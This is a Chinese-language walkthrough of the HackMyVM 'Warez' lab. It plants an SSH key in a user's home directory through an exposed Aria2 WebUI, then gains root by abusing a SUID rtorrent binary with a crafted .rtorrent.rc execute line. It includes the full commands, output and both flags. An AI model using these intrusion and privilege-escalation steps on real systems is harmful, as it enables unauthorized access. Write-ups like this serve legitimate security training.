[HMV] Warez
0x00 配置
攻击机 IP: 172.16.1.25
靶机 IP: 172.16.1.67
0x01 攻击
使用 Nmap 扫描目标靶机开放的端口
┌──(root㉿Kali-VM)-[~]
└─# nmap -sC -sV -p- 172.16.1.67
Starting Nmap 7.93 ( https://nmap.org )
Nmap scan report for 172.16.1.67
Host is up (0.00028s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 cc0063dd49fb1cc7ac6963bc051a59cd (RSA)
| 256 9b194925eb9c60c52bec2ad4fdd1c2f4 (ECDSA)
|_ 256 4116e6d0a0da224f073fc8cf602c0279 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Aria2 WebUI
|_http-server-header: nginx/1.18.0
6800/tcp open http aria2 downloader JSON-RPC
|_http-title: Site doesn't have a title.
MAC Address: 08:00:27:3D:F7:58 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.41 seconds
发现了三个端口,分别是 22(SSH)、80(HTTP)、6800(Aria2 RPC)。其中 80 端口似乎运行了一个 Aria2 的 WebUI,打开看看
发现了 Aria2 WebUI,同时在下载目录里发现了默认目录是用户 carolina 的家目录,看来 Aria2 对家目录有写入权限?尝试生成一个 SSH 密钥并下载到家目录的 .ssh 里
┌──(root㉿Kali-VM)-[~/work]
└─# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): ./id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in ./id_rsa
Your public key has been saved in ./id_rsa.pub
The key fingerprint is:
SHA256:nsnLu59VVs0nTKvu4ogErvTLgRo9haOnXE29o+GkJzs root@Kali-VM
The key's randomart image is:
+---[RSA 3072]----+
| . |
| o o.|
| + =|
| . . . o.|
| o o. .S . o |
| o =o. o.o . o |
|o *.o+.o= o |
|.*.E++oo.o.+ |
|o..oO+. *=+.. |
+----[SHA256]-----+
把 id_rsa.pub 拷贝一份,重命名为 authorized_keys,然后在本地搭建 HTTP 服务器,从 Aria2 WebUI 中下载 authorized_keys
发现下载成功
尝试登录 SSH
┌──(root㉿Kali-VM)-[~/work]
└─# chmod 600 ./id_rsa
┌──(root㉿Kali-VM)-[~/work]
└─# ssh carolina@172.16.1.67 -i ./id_rsa
The authenticity of host '172.16.1.67 (172.16.1.67)' can't be established.
ED25519 key fingerprint is SHA256:6KuYVOialBusL5WnriRRpDGS7zkNND0tbubZE160qDo.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.16.1.67' (ED25519) to the list of known hosts.
Linux warez 5.10.0-8-amd64 #1 SMP Debian 5.10.46-4 (2021-08-03) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 31 02:43:08 2021 from 192.168.1.51
carolina@warez:~$ :D
登录成功,获得 user flag
carolina@warez:~$ ls -al
total 40
drwxr-xr-x 4 carolina carolina 4096 Aug 31 2021 .
drwxr-xr-x 3 root root 4096 Aug 30 2021 ..
-rw-r--r-- 1 carolina carolina 220 Aug 30 2021 .bash_logout
-rw-r--r-- 1 carolina carolina 3526 Aug 30 2021 .bashrc
drwxr-xr-x 3 carolina carolina 4096 Aug 31 2021 .local
-rw-r--r-- 1 carolina carolina 807 Aug 30 2021 .profile
-rw-r--r-- 1 carolina carolina 66 Aug 31 2021 .selected_editor
drwx------ 2 carolina carolina 4096 May 21 19:52 .ssh
-rw------- 1 carolina carolina 19 Aug 31 2021 user.txt
-rw------- 1 carolina carolina 51 Aug 31 2021 .Xauthority
carolina@warez:~$ cat user.txt
HMVKeepdownloading
查看具有 SUID 权限的文件
carolina@warez:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/chsh
/usr/bin/rtorrent
/usr/bin/su
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
发现一个可疑程序 /usr/bin/rtorrent,搜索 GTFObins,发现可以直接用来提权
尝试直接提权
carolina@warez:/tmp$ echo "execute = /bin/sh,-p,-c,\"/bin/sh -p <$(tty) >$(tty) 2>$(tty)\"" >~/.rtorrent.rc
/usr/bin/rtorrent
# id
uid=1000(carolina) gid=1000(carolina) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(carolina)
# cd /root
# ls -al
total 28
drwx------ 3 root root 4096 Aug 31 2021 .
drwxr-xr-x 18 root root 4096 Aug 30 2021 ..
-rw------- 1 root root 181 Aug 31 2021 .bash_history
-rw-r--r-- 1 root root 571 Apr 10 2021 .bashrc
drwxr-xr-x 3 root root 4096 Aug 31 2021 .local
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile
-rw------- 1 root root 15 Aug 31 2021 root.txt
# cat root.txt
HMVKeepsharing
成功获得 root flag
0x02 总结
非常简单